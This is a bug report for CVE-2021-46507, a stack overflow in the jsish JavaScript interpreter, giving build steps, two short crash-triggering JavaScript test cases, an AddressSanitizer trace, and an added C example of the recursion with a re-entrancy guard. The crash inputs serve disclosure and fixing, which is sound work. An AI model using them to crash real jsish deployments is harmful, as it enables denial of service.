CVE-2021-46507: Stack-overflow src/jsiUtils.c:151 in Jsi_LogMsg · Issue #54 · pcmacdon/jsish
Jsish v3.5.0 was discovered to contain a stack overflow via Jsi_LogMsg at src/jsiUtils.c.
Jsish revision
Commit: 9fa798e
Version: v3.5.0
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
export CFLAGS='-fsanitize=address'
make
Test case 1
WebSocket({ "a": 2.3023e-320 })
Test case 2
var JSEtest = times(function () {
    WebSocket({ 'red': (new Object(null % null)) });
}) < times(log(null % null));
assert.sameValue(JSEtest.length, 2, 'newArr.length');
Execution steps & Output
$ ./jsish/jsish poc.js
ASAN:DEADLYSIGNAL
ERROR: AddressSanitizer: stack-overflow on address 0x7ffe51210dfc (pc 0x55d8eb693014 bp 0x0fffca2427b6 sp 0x7ffe51210df0 T0)
    #0 0x55d8eb693013 in Jsi_LogMsg src/jsiUtils.c:151
    #1 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
    #2 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
    #3 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
    #4 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
    #5 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
    #6 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
    … … … … … …
    #246 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
    #247 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
    #248 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
    #249 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526
    #250 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229
SUMMARY: AddressSanitizer: stack-overflow src/jsiUtils.c:151 in Jsi_LogMsg
====ABORTING
Credits: Found by OWL337 team.
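
The trace above shows Jsi_LogMsg and Jsi_ValueToString calling each other until the stack is exhausted. The following is an added example, not jsish code and not the project's fix: a minimal C model of that logger/formatter cycle with a re-entrancy guard, assuming the formatter reports a failed conversion through the logger. All names in it are hypothetical.

```c
/* Added illustration; not jsish source. All names here are hypothetical. */
#include <stdio.h>

#define LOG_MAX_DEPTH 1              /* assumed policy: no nested log calls */

typedef struct { int convertible; const char *text; } value_t;

static int log_depth;                /* live nesting level of log_value() */
static int log_suppressed;           /* nested calls refused by the guard */

static int log_value(const value_t *v, const char *what);

/* Formatter that reports a failed conversion through the logger. */
static const char *value_to_string(const value_t *v)
{
    if (!v->convertible) {
        log_value(v, "cannot convert value");   /* re-enters the logger */
        return "<unprintable>";
    }
    return v->text;
}

/* Logger that formats its argument. Returns 1 if a line was written,
 * 0 if the call was refused because a log call is already in progress. */
static int log_value(const value_t *v, const char *what)
{
    if (log_depth >= LOG_MAX_DEPTH) {           /* re-entrancy guard */
        log_suppressed++;
        return 0;
    }
    log_depth++;
    fprintf(stderr, "log: %s: %s\n", what, value_to_string(v));
    log_depth--;
    return 1;
}

int main(void)
{
    value_t bad = { 0, NULL }, ok = { 1, "2.5" };   /* constructed inputs */
    int wrote_bad = log_value(&bad, "option value");
    int wrote_ok = log_value(&ok, "option value");
    printf("bad=%d ok=%d suppressed=%d depth=%d\n",
           wrote_bad, wrote_ok, log_suppressed, log_depth);
    return 0;
}
```

Without the guard at the top of `log_value`, the unconvertible value makes the two functions alternate without bound, which is the frame pattern in the AddressSanitizer report.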